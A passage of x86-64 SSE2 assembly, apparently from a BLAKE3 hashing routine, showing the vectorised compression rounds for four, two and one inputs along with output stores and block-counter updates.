pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
pxor xmm0, xmm8
pxor xmm1, xmm9
pxor xmm2, xmm10
pxor xmm3, xmm11
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
pxor xmm4, xmm12
pxor xmm5, xmm13
pxor xmm6, xmm14
pxor xmm7, xmm15
mov eax, r13d
jne 9b
movdqa xmm9, xmm0
punpckldq xmm0, xmm1
punpckhdq xmm9, xmm1
movdqa xmm11, xmm2
punpckldq xmm2, xmm3
punpckhdq xmm11, xmm3
movdqa xmm1, xmm0
punpcklqdq xmm0, xmm2
punpckhqdq xmm1, xmm2
movdqa xmm3, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm3, xmm11
movdqu xmmword ptr [rbx], xmm0
movdqu xmmword ptr [rbx+0x20], xmm1
movdqu xmmword ptr [rbx+0x40], xmm9
movdqu xmmword ptr [rbx+0x60], xmm3
movdqa xmm9, xmm4
punpckldq xmm4, xmm5
punpckhdq xmm9, xmm5
movdqa xmm11, xmm6
punpckldq xmm6, xmm7
punpckhdq xmm11, xmm7
movdqa xmm5, xmm4
punpcklqdq xmm4, xmm6
punpckhqdq xmm5, xmm6
movdqa xmm7, xmm9
punpcklqdq xmm9, xmm11
punpckhqdq xmm7, xmm11
movdqu xmmword ptr [rbx+0x10], xmm4
movdqu xmmword ptr [rbx+0x30], xmm5
movdqu xmmword ptr [rbx+0x50], xmm9
movdqu xmmword ptr [rbx+0x70], xmm7
movdqa xmm1, xmmword ptr [rsp+0x110]
movdqa xmm0, xmm1
paddd xmm1, xmmword ptr [rsp+0x150]
movdqa xmmword ptr [rsp+0x110], xmm1
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm0, xmm1
movdqa xmm1, xmmword ptr [rsp+0x120]
psubd xmm1, xmm0
movdqa xmmword ptr [rsp+0x120], xmm1
add rbx, 128
add rdi, 32
sub rsi, 4
cmp rsi, 4
jnc 2b
test rsi, rsi
jnz 3f
4:
mov rsp, rbp
pop rbp
pop rbx
pop r12
pop r13
pop r14
pop r15
ret
.p2align 5
3:
test esi, 0x2
je 3f
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movaps xmm8, xmm0
movaps xmm9, xmm1
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
movaps xmmword ptr [rsp], xmm13
movd xmm14, dword ptr [rsp+0x114]
movd xmm13, dword ptr [rsp+0x124]
punpckldq xmm14, xmm13
movaps xmmword ptr [rsp+0x10], xmm14
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
movaps xmm10, xmm2
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm3, xmm4
shufps xmm4, xmm5, 136
shufps xmm3, xmm5, 221
movaps xmm5, xmm3
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm3, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm3, xmm7, 221
pshufd xmm7, xmm3, 0x93
movups xmm12, xmmword ptr [r9+rdx-0x40]
movups xmm13, xmmword ptr [r9+rdx-0x30]
movaps xmm11, xmm12
shufps xmm12, xmm13, 136
shufps xmm11, xmm13, 221
movaps xmm13, xmm11
movups xmm14, xmmword ptr [r9+rdx-0x20]
movups xmm15, xmmword ptr [r9+rdx-0x10]
movaps xmm11, xmm14
shufps xmm14, xmm15, 136
pshufd xmm14, xmm14, 0x93
shufps xmm11, xmm15, 221
pshufd xmm15, xmm11, 0x93
shl rax, 0x20
or rax, 0x40
movq xmm3, rax
movdqa xmmword ptr [rsp+0x20], xmm3
movaps xmm3, xmmword ptr [rsp]
movaps xmm11, xmmword ptr [rsp+0x10]
punpcklqdq xmm3, xmmword ptr [rsp+0x20]
punpcklqdq xmm11, xmmword ptr [rsp+0x20]
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm8, xmm12
movaps xmmword ptr [rsp+0x20], xmm4
movaps xmmword ptr [rsp+0x30], xmm12
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm5
paddd xmm8, xmm13
movaps xmmword ptr [rsp+0x40], xmm5
movaps xmmword ptr [rsp+0x50], xmm13
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x93
pshufd xmm8, xmm8, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x39
pshufd xmm10, xmm10, 0x39
paddd xmm0, xmm6
paddd xmm8, xmm14
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
pshuflw xmm11, xmm11, 0xB1
pshufhw xmm11, xmm11, 0xB1
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 20
psrld xmm4, 12
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 20
psrld xmm4, 12
por xmm9, xmm4
paddd xmm0, xmm7
paddd xmm8, xmm15
paddd xmm0, xmm1
paddd xmm8, xmm9
pxor xmm3, xmm0
pxor xmm11, xmm8
movdqa xmm13, xmm3
psrld xmm3, 8
pslld xmm13, 24
pxor xmm3, xmm13
movdqa xmm13, xmm11
psrld xmm11, 8
pslld xmm13, 24
pxor xmm11, xmm13
paddd xmm2, xmm3
paddd xmm10, xmm11
pxor xmm1, xmm2
pxor xmm9, xmm10
movdqa xmm4, xmm1
pslld xmm1, 25
psrld xmm4, 7
por xmm1, xmm4
movdqa xmm4, xmm9
pslld xmm9, 25
psrld xmm4, 7
por xmm9, xmm4
pshufd xmm0, xmm0, 0x39
pshufd xmm8, xmm8, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm11, xmm11, 0x4E
pshufd xmm2, xmm2, 0x93
pshufd xmm10, xmm10, 0x93
dec al
je 9f
movdqa xmm12, xmmword ptr [rsp+0x20]
movdqa xmm5, xmmword ptr [rsp+0x40]
pshufd xmm13, xmm12, 0x0F
shufps xmm12, xmm5, 214
pshufd xmm4, xmm12, 0x39
movdqa xmm12, xmm6
shufps xmm12, xmm7, 250
pand xmm13, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm12, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm13, xmm12
movdqa xmmword ptr [rsp+0x20], xmm13
movdqa xmm12, xmm7
punpcklqdq xmm12, xmm5
movdqa xmm13, xmm6
pand xmm12, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm13, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm12, xmm13
pshufd xmm12, xmm12, 0x78
punpckhdq xmm5, xmm7
punpckldq xmm6, xmm5
pshufd xmm7, xmm6, 0x1E
movdqa xmmword ptr [rsp+0x40], xmm12
movdqa xmm5, xmmword ptr [rsp+0x30]
movdqa xmm13, xmmword ptr [rsp+0x50]
pshufd xmm6, xmm5, 0x0F
shufps xmm5, xmm13, 214
pshufd xmm12, xmm5, 0x39
movdqa xmm5, xmm14
shufps xmm5, xmm15, 250
pand xmm6, xmmword ptr [PBLENDW_0x33_MASK+rip]
pand xmm5, xmmword ptr [PBLENDW_0xCC_MASK+rip]
por xmm6, xmm5
movdqa xmm5, xmm15
punpcklqdq xmm5, xmm13
movdqa xmmword ptr [rsp+0x30], xmm2
movdqa xmm2, xmm14
pand xmm5, xmmword ptr [PBLENDW_0x3F_MASK+rip]
pand xmm2, xmmword ptr [PBLENDW_0xC0_MASK+rip]
por xmm5, xmm2
movdqa xmm2, xmmword ptr [rsp+0x30]
pshufd xmm5, xmm5, 0x78
punpckhdq xmm13, xmm15
punpckldq xmm14, xmm13
pshufd xmm15, xmm14, 0x1E
movdqa xmm13, xmm6
movdqa xmm14, xmm5
movdqa xmm5, xmmword ptr [rsp+0x20]
movdqa xmm6, xmmword ptr [rsp+0x40]
jmp 9b
9:
pxor xmm0, xmm2
pxor xmm1, xmm3
pxor xmm8, xmm10
pxor xmm9, xmm11
mov eax, r13d
cmp rdx, r15
jne 2b
movups xmmword ptr [rbx], xmm0
movups xmmword ptr [rbx+0x10], xmm1
movups xmmword ptr [rbx+0x20], xmm8
movups xmmword ptr [rbx+0x30], xmm9
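# Scalar counter advance: [rsp+0x130] holds the increment_counter mask (0 or -1);
# neg turns it into an index (0 or 1) that selects either the original counter
# words or the ones two lanes further on.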
mov eax, dword ptr [rsp+0x130]
neg eax
mov r10d, dword ptr [rsp+0x110+8*rax]
mov r11d, dword ptr [rsp+0x120+8*rax]
mov dword ptr [rsp+0x110], r10d
mov dword ptr [rsp+0x120], r11d
add rdi, 16
add rbx, 64
sub rsi, 2
3:
test esi, 0x1
je 4b
movups xmm0, xmmword ptr [rcx]
movups xmm1, xmmword ptr [rcx+0x10]
movd xmm13, dword ptr [rsp+0x110]
movd xmm14, dword ptr [rsp+0x120]
punpckldq xmm13, xmm14
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movaps xmm2, xmmword ptr [BLAKE3_IV+rip]
shl rax, 32
or rax, 64
movq xmm12, rax
movdqa xmm3, xmm13
punpcklqdq xmm3, xmm12
movups xmm4, xmmword ptr [r8+rdx-0x40]
movups xmm5, xmmword ptr [r8+rdx-0x30]
movaps xmm8, xmm4
shufps xmm4, xmm5, 136
shufps xmm8, xmm5, 221
movaps xmm5, xmm8
movups xmm6, xmmword ptr [r8+rdx-0x20]
movups xmm7, xmmword ptr [r8+rdx-0x10]
movaps xmm8, xmm6
shufps xmm6, xmm7, 136
pshufd xmm6, xmm6, 0x93
shufps xmm8, xmm7, 221
pshufd xmm7, xmm8, 0x93
mov al, 7
9:
paddd xmm0, xmm4
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm5
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x93
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x39
paddd xmm0, xmm6
paddd xmm0, xmm1
pxor xmm3, xmm0
pshuflw xmm3, xmm3, 0xB1
pshufhw xmm3, xmm3, 0xB1
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 20
psrld xmm11, 12
por xmm1, xmm11
paddd xmm0, xmm7
paddd xmm0, xmm1
pxor xmm3, xmm0
movdqa xmm14, xmm3
psrld xmm3, 8
pslld xmm14, 24
pxor xmm3, xmm14
paddd xmm2, xmm3
pxor xmm1, xmm2
movdqa xmm11, xmm1
pslld xmm1, 25
psrld xmm11, 7
por xmm1, xmm11
pshufd xmm0, xmm0, 0x39
pshufd xmm3, xmm3, 0x4E
pshufd xmm2, xmm2, 0x93
dec al
jz 9f
movdqa xmm8, xmm4
shufps xmm8, xmm5, 214
